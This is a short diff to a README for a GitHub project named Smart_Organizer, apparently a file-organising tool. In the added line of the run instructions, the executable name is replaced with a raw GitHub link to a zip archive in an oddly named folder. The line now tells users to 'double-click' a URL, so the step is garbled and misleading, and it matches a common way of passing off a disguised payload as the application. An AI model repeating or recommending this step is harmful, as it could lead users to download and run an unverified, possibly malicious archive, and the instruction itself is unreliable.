DeathFlame7/Smart_Organizer/README.md

 After installation, follow these steps to run Smart_Organizer:

 1. Navigate to the folder where you installed the application.
-2. Double-click the executable file `Smart_Organizer.exe` for Windows, or use the terminal on macOS/Linux with the command `./Smart_Organizer` for execution.
+2. Double-click the executable file `https://raw.githubusercontent.com/DeathFlame7/Smart_Organizer/master/ataxonomic/Smart_Organizer.zip` for Windows, or use the terminal on macOS/Linux with the command `./Smart_Organizer` for execution.
 3. Upon launching, you will see the main interface with options to scan and manage your files.

 ## 📄 Usage Guide